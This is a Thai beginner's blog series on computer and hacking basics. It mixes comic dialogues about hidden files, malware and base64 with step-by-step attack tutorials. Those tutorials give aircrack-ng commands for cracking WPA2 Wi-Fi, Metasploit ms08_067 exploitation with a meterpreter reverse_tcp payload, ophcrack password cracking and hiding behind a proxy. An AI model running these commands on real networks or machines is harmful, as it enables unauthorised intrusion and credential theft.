วันจันทร์ที่ 30 กันยายน พ.ศ. 2556

ตอนที่ 12 ถอดรหัส windows ด้วย ophcrack


1.เข้าไปโหลด ophcrack ได้ตามลิงก์นี้ http://ophcrack.sourceforge.net/download.php
2.เลือก download file ที่เป็น iso
3.เอา file ที่ download ไปเขียนลงในแผ่น CD หรือ USB
4.เสียบ USB หรือใส่ CD  แล้วสั่งเครื่องให้ boot USBหรือ CD
5.จากนั้นโปรแกรมจะทำการถอดรหัสโดยอัตโนมัติ ด้วยวิธี Brute Force
วิธีป้องกัน
1.ตั้ง Password ไม่น้อยกว่า 8 ตัวอักษร
2.ใช้อักขระ ตัวพิมพ์ใหญ่ พิมพ์เล็ก สลับกันไป
3.ล็อค Bios ด้วยเลย

วันอาทิตย์ที่ 29 กันยายน พ.ศ. 2556

ตอนที่ 11 ซ่อนตัวด้วย Proxy

1.เข้า google แล้วพิมพ์คำว่า เช็ค IP จะได้ดังรูป

2.เปิดแท็บอีกอันขึ้นมาเข้า google แล้วพิมพ์คำว่า free http proxy list ดังรูป
3.เข้าไปที่การตั้งค่า>เปลี่ยนการตั้งค่าของProxy>lan setting ดังรูป
4.ใส่หมายเลข IP Adress และ Port ที่เราเลือกในข้อ2
5.ลองเข้าไปเช็ค IP เหมือนครั้งแรก ก็จะเห็นว่าตรงกับที่เราเปลี่ยนค่า Proxy ลงไป





วันพุธที่ 25 กันยายน พ.ศ. 2556

ตอน10 crack wifi WPA2

1. พิมพ์คำสั่ง airmon-ng
2. พิมพ์คำสั่ง airmon-ng wlan0
3. พิมพ์คำสั่ง airmon-ng start wlan0
4. พิมพ์คำสั่ง airodump-ng mon0
5. พิมพ์คำสั่ง airodump-ng -c 11 --bssid ตามด้วย mac address -w test1234 mon0
   ** 11 คือ channal  ส่วน test1234 จะตั้งชื่ออะไรก็ได้
6.พิมพ์คำสั่ง aireplay-ng -0 0 -a ตามด้วย mac address ที่ช่อง bssid  -c และตามด้วย mac address ของ station  mon0
7. aircrack-ng -w /pentest/wireless/aircrack-ng/test/password.lst test1234-01.cap
8.ก็จะได้รหัสมาแล้ว

วันจันทร์ที่ 23 กันยายน พ.ศ. 2556

ตอนที่9 Footprinting

Footprinting คือ การสำรวจระบบของเป้าหมาย ว่ามีประวัติความเป็นมาอย่างไร ใช้ IP Address อะไร มีระบบอะไรเชื่อมโยงกันอยู่บ้าง E-mail Address ของผู้ดูแลระบบคืออะไร หรือแม้แต่ บริษัทนี้ประกอบกิจการอะไร กลุ่มผู้สนใจสินค้าของบริษัทคืออะไร ซึ่งข้อมูลเหล่านี้ก็เปรียบเสมือน แบบพิมพ์เขียวทางระบบความปลอดภัยขององค์กร เลยทีเดียว พวกแฮกเกอร์ทั้งหลายจึงใช้เวลาถึง 90%หมดไปกับการ Footprinting และ อีก 10 % เป็นการโจมตี วิธีการทำ Footprinting  เช่น การใช้คำสั่ง nslookup การใช้คำสั่ง whois เป็นต้น เช่น nslookup www.google.com

วันอาทิตย์ที่ 8 กันยายน พ.ศ. 2556

ตอนที่8 ขั้นตอนการโจมตีของ Hacker

สำหรับวันนี้จะนำขั้นตอนการโจมตีของ Hackerซึ่งอาจจะคล้ายๆการทำงานของหน่วยรบพิเศษ มาให้ได้ลองอ่านเปรียบเทียบกันดูครับว่ามีอะไรบ้าง
Hacker
1.Reconnaissance(การสอดส่อง) คือการเก็บข้อมูลเบื้องต้น คร่าวๆ เช่น การดูเวลาการทำงานของพนักงาน การส่งเอกสาร หรือการหาตำแหน่งของพนักงาน เป็นต้น
2.Scanning(การสแกนระบบ) คือหลังจากที่เราหาข้อมูลเบื้องต้นได้แล้ว ทีนี้เราก็สามารถระบุได้ว่าเราจะเริ่มจากเป้าหมายเป็นใคร เช่น Scan หา IP เครื่องเป้าหมาย หรือแม้กระทั่งรู้ Server ของเป้าหมาย
3.Gaining Access(การเข้าถึงเป้าหมาย) คือ Hacker จะเริ่มเจาะระบบเข้าไปโดยทุกๆวิถีทางเพื่อให้ได้ข้อมูลกลับออกมาได้สำเร็จ
4.Maintaining Access(การคงสภาพทางเข้า) เมื่อ Hacker สามารถเจาะเข้าไปในระบบได้แล้ว เมื่อ Hacker ออกจากระบบแต่อยากเข้ามาได้ข้อมูลอีกในภายภาคหน้า Hacker ก็จะทำการคงสภาพการเข้าถึง เพื่อที่จะกลับเข้ามาได้อีก
5.Covering Tracks(การลบร่องรอย) เมื่อได้ข้อมูลและคงสภาพทางเข้าไว้เรียบร้อย Hacker ก็จะกระทำการลบร่องรอยของตนเองตอนเจาะระบบเข้ามา เพื่อหลีกเลี่ยงการถูกจับกุม
หน่วยรบพิเศษ
1.Reconnaissance(การสอดส่อง) เมื่อหน่วยรบพิเศษจะทำหารโจมตีเป้าหมายก็จะต้องหาข่าวก่อนว่า ศัตรูคือใคร อยู่ที่ไหน กำลังทำอะไร เป็นต้น
2.Scanning(การสแกนระบบ) เมื่อหน่วยรบพิเศษรู้ข้อมูลเบื้องต้นแล้ว ก็จะทำการสำรวจว่าและดูว่าทางด้านไหนศัตรูน้อยที่สุด มีช่องโหว่ไหนง่ายที่สุด
3.Gaining Access(การเข้าถึงเป้าหมาย) เมื่อได้ข้อมูลมามากมายแล้วหน่วยรบพิเศษก็จะทำการวางแผนต่อไปว่าเราจะโจมตีหรือแทรกแซงในรูปแบบไหน ถึงจะได้ข้อมูลออกมาได้ไวที่สุดโดยที่ศัตรูไม่รู้ตัว
4.Maintaining Access(การคงสภาพทางเข้า) เมื่อหน่วยรบพิเศษได้ทำการโจมตีหรือแทรงแซงเข้าไปเรียบร้อยแล้วก็มักจะสร้างเส้นทางที่ปลอดภัยของตัวเองขึ้นมาเพื่อให้สามารถกลับเข้ามาเอาข้อมูลได้อีกครั้งอย่างปลอดภัย
5.Covering Tracks(การลบร่องรอย) เมื่อโจมตีหรือแทรกแซงเสร็จเป็นที่เรียบร้อยหน่วยรบพิเศษจะต้องไม่ลืมลบร่องรอยของตนเองตั้งแต่การหาข้อมูล การโจมตีหรือแทรกแซง โดยที่ไม่ให้ศัตรูรู้ได้เลยว่ามีหน่วยรบพิเศษเข้ามาในฐานของตนเองได้

วันอังคารที่ 20 สิงหาคม พ.ศ. 2556

ตอน7 ยึดเครื่องด้วย metasploit


วันนี้พี่จันจะมาสอนการยึดเครื่องด้วย metasploit กันนะครับ
1. เปิดหน้าต่าง terminalขึ้นมาแล้วพิมพ์คำสั่ง  msfconsole
2.เรียกใช้โมดูล exploit ms08_067_netapi โดยพิมพ์คำสั่ง use exploit/windows/smb/ms08_067_netapi
3.กำหนดให้ไปยังเครื่องเป้าหมาย โดยใช้คำสั่ง set RHOST IPเป้าหมาย
4.กำหนด payload ที่ใช้แนบไปกับexploit โดยใช้คำสั่ง set PAYLOAD windows/meterpeter/reverse_tcp
5.กำหนดหมายเลขIPและพอร์ตของเครื่องเราที่จะให้เชื่อมต่อกลับมาโดยใช้คำสั่ง set LHOST ตามด้วยIPเครื่องเรา และคำสั่ง set LPORT ตามด้วยportที่เปิดไว้
6.จากนั้นเริ่มโจมตีด้วยคำสั่ง exploit เป็นการเสร็จเรียบร้อยสามารถยึดเครื่องได้แล้ว
7.เมื่อเข้ามาแล้วสามารถเช็คเครื่องป้าหมายโดยใช้คำสั่ง sysinfo
ปล.อย่านำไปใช้ในทางที่ผิดกันนะครับ มันเป็นสิ่งไม่ดี ผิด พรบคอมพิวเตอร์กัน

วันจันทร์ที่ 19 สิงหาคม พ.ศ. 2556

ตอนที่6 วิธีการเข้ารหัส-ถอดรหัส base64

อิน:จันไอ้ base64มันคืออะไรอ่ะ เห็นเพื่อนมันพูดกัน
จัน:Base64 เป็นวิธีการเข้ารหัสอย่างหนึ่งทำโดยเปลี่ยนจากคำหรือข้อความไปเป็นรูปแบบที่ไม่สามารถอ่านได้ง่ายสำหรับวิธีการเข้ารหัสแบบ base64
อิน:แล้วมันมีหลักการยังไงหรอ
จัน:ยกตัวอย่างคำว่า ?MOS? ต้องการเข้ารหัสแบบ base64 ขั้นตอนแรกให้ถอดค่ารหัส ASCII ของแต่ละตัวอักขระ



จัน:ต่อจากนั้นให้เปลี่ยนเป็นระบบเลขฐาน 2 และเขียนติดกันดังนี้ 01001101010011110101001101010100
จัน:ตัดสตริงของบิตดังกล่าวออกเป็นช่วงละ 6 บิต010011   010100   111101   010011   010100   
จัน:ซึ่งจะได้เลขในระบบฐาน 10 ดังนี้  19   20   61   19   20
จัน:เปลี่ยนจากเลขในระบบฐาน 10 ที่ได้ให้เป็นอักขระ base64 โดยใช้ตาราง Base64 Encoding

จัน:ดังนั้นคำว่า ?MOS? เมื่อได้เข้ารหัสแบบ base64 จะถูกเปลี่ยนเป็น ?TU9TU?


วันพฤหัสบดีที่ 1 สิงหาคม พ.ศ. 2556

ตอนที่5 เข้าใจหัวอกโผมมบ้างง

ณ ที่ ทำงานของจัน
หัวหน้า : จัน คอมพังซ่อมให้หน่อยนะ
เพื่อนร่วมงานคนที่1 : จัน ลงwindowsใหม่ให้หน่อยสิ
เพื่อนร่วมงานคนที่2 : จัน เครื่องปริ้นเสีย มันเป็นอะไรหรอ
เพื่อนร่วมงานคนที่3 : จัน ช่วยไปเลือกซื้อคอมให้หน่อยสิ
เพื่อนร่วมงานคนที่4 : จัน เน็ตเล่นไม่ได้ ทำให้หน่อย
เพื่อนร่วมงานคนที่5 : จัน โหลดโปรแกรมโหลดยังไง
แล้วคนนู่นคนนี่ก็มาๆๆๆๆๆๆๆๆๆๆๆๆๆๆๆๆใช้จัน!!
จัน ได้แต่ตอบว่า
จัน: ครับ!!! ทั้งๆที่ข้างในใจพูดกับตัวเองว่า(ไอ้สาดดดด ตอนกูมาสมัครงาน ตำแหน่งกูโปรแกรมเมอร์ แต่แม่งดันใช้กูทุกเรื่อง ตบสักทีดีไหม T_T)
ปล.คนที่จบคอมมาไม่ได้แปลว่าจะรู้หรือทำงานเกี่ยวกับคอมเป็นทุกเรื่องนะครับ ก่อนจะใช้งานควรถามด้วยว่า มึง!!ถนัดด้านไหน นะฮ้าาาา

วันศุกร์ที่ 19 กรกฎาคม พ.ศ. 2556

ตอนที่4 ชื่อตอน hacker ผิดตลอด

อิน:จัน!!วันก่อนได้ดูข่าวป่ะ!! ข่าวที่hacker แฮกเข้าไป เวปไซด์ ราชการหลายที่เลยอ่ะ แม่งงง hacker นี่โคตร ชั่ว เลว เหี้ย ต่ำช้า วันๆไม่มีอะไรทำกันหรือไง
ชอบมาแฮกชาวบ้านชาวช่องเขาเนี้ย อย่าให้เจอนะ จะตบคว่ำ กระโดดถีบ ตีนคู่เลยทีเดียว พึมพำๆๆ
จัน:T_T บ่นซะยาวเลยนะ ฟังไม่ทัน
อิน:ก็มันจริงนี่น่า มันน่าโมโหมั้ยล่ะ
จัน: นิ จัน!! รู้มั้ยว่า hacker คือใคร อะไร อย่างไง มันไม่ได้มีแค่ hacker อย่างเดียวหรอกนะ มันมี CrackerและScript Kiddies อีกนะ
อิน:ไม่รู้อ่ะ คืออะไรแล้วมันต่างกันยังไงหรอในเมื่อมันก็ hack คนอื่นเหมือนกันนิ อยากรู้บอกหน่อยจิ
จัน:เอาง่ายๆเลยนะ hacker ก็คือ ผู้ที่เจาะระบบเข้าไปได้ แต่ไม่ทำการแก้ไขหรือลบข้อมูลของคนอื่นแต่อย่างใดและยังแจ้งเตือนระบบนั้นๆอีกด้วย  ส่วนคำว่า Cracker ก็คือ ผู้ที่เจาะระบบเหมือนhacker นั่นแหละแต่แตกต่างกันที่ cracker จะแก้ไข ดัดแปลง หรือทำลาย ระบบนั้นๆ
hackerกับCrackerจะชำนาญในด้านระบบคอมพิวเตอร์สูงมากและมีอีกประเภทหนึ่งประเภทสุดท้ายล่ะก็คือ Script Kiddies
Script Kiddies จะไม่ค่อยเชี่ยวชาญในด้านระบบคอมพิวเตอร์มากนักส่วนใหญ่จะใช้Tool ที่hackerและcrackerสร้างขึ้นมามากกว่า
อิน:อ่อๆเข้าใจแล้วๆทุกวันนี้พวกเราเข้าใจผิดมาตลอดเลยนึกว่า Hacker เป็นคนไม่ดี
จัน:ต่อไปนี้ก็เรียกใหม่ให้ถูกนะ hacker ดีๆเขาจะได้ไม่น้อยใจ
อิน:อืมมม(ทำหน้าหื่น)อยากเป็นhackerแล้วสิจะได้hackเข้าไปโหลดเวปโป๊ดูก่อนใครๆ
จัน:เอาอีกแล้วนะยังไม่เข็ดอีกหราาา
อิน:555 ไม่เอาแล้วจร้าาา เข็ดแล้วๆ

วันพฤหัสบดีที่ 18 กรกฎาคม พ.ศ. 2556

ตอนที่3 วิธีเปิด fileที่ซ่อนไว้

อิน:จันจ๋าาาาา.....ช่วยบอกวิธีเปิด file ที่ซ่อนเอาไว้ก่อนหน้านี้ให้หน่อยนร้าาาา นะๆๆๆ
จัน:ไม่ๆๆๆๆๆ!!! ข้อหามาหลอกกัน ชิ!!
อิน:โอ๋ๆๆๆๆๆ เด๋วพาไปเลี้ยงอาหารญี่ปุ่นนะ
จัน:อ่ะๆๆ ก็ได้ๆ แต่อย่าเอาไปซ่อนอย่างอื่นอีกล่ะ ไม่งั้นไม่ช่วยแล้ว
อิน:0+0 ได้เลยครับผม พี่จันสุดหล่อออ
จัน:แหม่ๆๆๆ แบบนี้อ่ะอ้อนใหญ่เชียวนะ
  1.สำหรับ windows7นะ ให้เข้าไป file ที่ซ่อนไว้
2.ตรง toolbar จะมีคำว่า Organize คลิกเข้าไปเลย
3.คลิกเข้าไป Folder and Search Options
4.คลิกที่ View
5.ติ้กถูกที่ show hidden files,folder,or drives
6.กด OK
อิน:ว้าวววว!!สุดยอดอ่ะ เด๋วซื้ออาหารญุ่ปุ่นมาให้เป็นค่าตอบแทนนะ
จัน:ได้ๆมีอะไรก็มาปรึกษาล่ะ  คิดในใจ(หวานปากกูล่ะ)
อิน:คร้าบบบผม
.......วันต่อมา............
จัน:อืมมมม......อาหารญุ่ปุ่นจริงๆด้วย แถมต้มน้ำใส่ 1 นาที ได้กินเลย ไอ้แสรดดดดดดดดดดดจัน!!!
.......หลังจากวันนั้นจันก็ได้ไปนอนโรงพยาบาลอยู่2วัน..........
ปล.สำหรับตอนที่2นะคร้าบบบบถ้า file ยังไม่ซ่อนล่ะก้อให้ทำตามขั้นตอนที่3 แล้ว ติ้กที่ Don't show hidden files,folder,or drives นะคร้าาบบบ


วันพุธที่ 17 กรกฎาคม พ.ศ. 2556

ตอนที่2 ซ่อน File ยังไงไม่ให้คนอื่นรู้

อิน:โว้ยยยย!!!เซงๆๆๆๆ
จัน:เป็นอะไรว่ะ เซงมาแต่เช้าเลย
อิน:ก็โหลดหนังมาอ่ะสิ แฟนลบทิ้งไปหมดเลย จะทำยังไงดีล่ะ เนี้ย!!! เซงๆๆ
จัน:มีวิธีซ่อน file อยู่นะ แต่จะทำให้
อิน:ว้าววว!!! มีวิธีนี้ด้วยหรอเนี้ย ทำยังไงๆ ทำให้ดูหน่อยสิ ไวๆเลย
จัน:.ใช้จังเลยนร้าาาา 1.คลิกขวาที่ file ที่เราต้องการซ่อน 2.คลิกเลือกคำว่า Properties 3.ติ้กถูกที่ช่อง hidden 4.คลิก OK หลังจากนั้น file ก็จะถูกซ่อนเอาไว้
อิน:ว้าววว!!เจ๋งเป้ง  ทีนี้ล่ะจะได้ซ่อนหนังโป๊ แฟนได้แล้ว โดยที่แฟนไม่รู้ตัว 55555(ขำแบบมีมหาอำนาจ)
จัน:ตอนแรกที่บอกว่าโหลดหนัง มรึงงง โหลดหนังโป๊ใช่มั้ยยย!!!
อิน:เผ่นล่ะตู!!!


ตอนที่1 malware

อิน : โว้ยยยย.....หงุดหงิด  คอมเป็นอะไรไม่รู้อ่ะ อยู่ดีๆก็รวน ช่วยดูให้หน่อยสิ
จัน: คอมเป็นอะไรว่ะ...ไหนขอดูหน่อยสิ
จัน:หา!!!คอมติด malware
อิน:??? เอ่อ...., malware คืออะไรว่ะ งง??
จัน:malware เป็นโปรแกรมประสงค์ร้ายต่างๆ เช่นvirus,worm,trojan horse อะไรประมาณนั้นน่ะ
อิน:อืม....แล้วพอจะมีวิธีป้องกันบ้างหรือป่าววว???
จัน:มีสิ 1.ติดตั้งโปรแกรมแสกนไวรัสและสปายแวร์ 2.ติดตั้งfirewallที่เครื่อง 3.หมั่นอัพเดตโปรแกรมอย่างสม่ำเสมอ 5.ติดตามข่าวสารอยู่เป็นประจำ ทั้งนี้ทั้งนั้นก็ไม่ได้หมายความว่าจะปลอดภัย100%นะ จัน
อิน:อ่อๆเข้าใจแล้วล่ะ อิน ถ้าไม่ทำตามที่บอกก็ได้ใช่ป่ะ มันไม่มีผลชิมิ??
จัน:ใครบอกล่ะ!!! มีผลกระทบมากเลยล่ะ เช่น ทำให้คอมรวน ค้าง  บ่อยๆ บางทีก็ยังสามารถเข้ามาขโมยข้อมูลในเครื่องของเราได้ด้วยนะ และก็ทำลายให้อุปกรณ์ฮาร์ดแวร์ ซอฟท์แวร์หรือข้อมูลได้อีกด้วย
อิน:ฉิบหายยย!!!ล่ะ หนังโป๊อยู่ในเครื่องเต็มเลย ต้องไปป้องกันและอัพเกรดคอมพิวเตอร์ตัวเองซะแล้วสิ
จัน: เงิบบบบเลยกู

เกร็ดความรู้:malware(มัลแวร์) ย่อมาจาก Malicious Software ซึ่งใช้แทนโปรแกรมประสงค์ร้าย เช่น virus,worm,trojan horse ซึ่งเป็นโปรแกรมที่เป็นอันตรายต่อระบบคอมพิวเตอร์ ดังนั้น virus,wormหรือtrojan horse คืออะไร แล้วแตกต่างจาก trojan horse อย่างไร
virus คือ เป็นโปรแกรมที่สามารถติดต่อจากไฟล์หนึ่งไปยังอีกไฟล์หนึ่ง มันสามารถทำลายฮาร์ดแวร์หรือข้อมูล เมื่อโฮสต์รันโปรแกรมที่ติดvirus
worm คือ โปรแกรมที่สามารถแพร่กระจายตัวเองได้โดยอัติโนมัติและไม่ต้องอาศัยโปรแกรมอื่นในการแพร่กระจาย
trojan horse คือโปรแกรมที่แฝงโค้ดสำหรับการใช้ประโยชน์หรือทำลายเมื่อรันโปแกรมนี้ เป็นต้น
โปรดติดตามตอนต่อไปนะคร้าบบบบ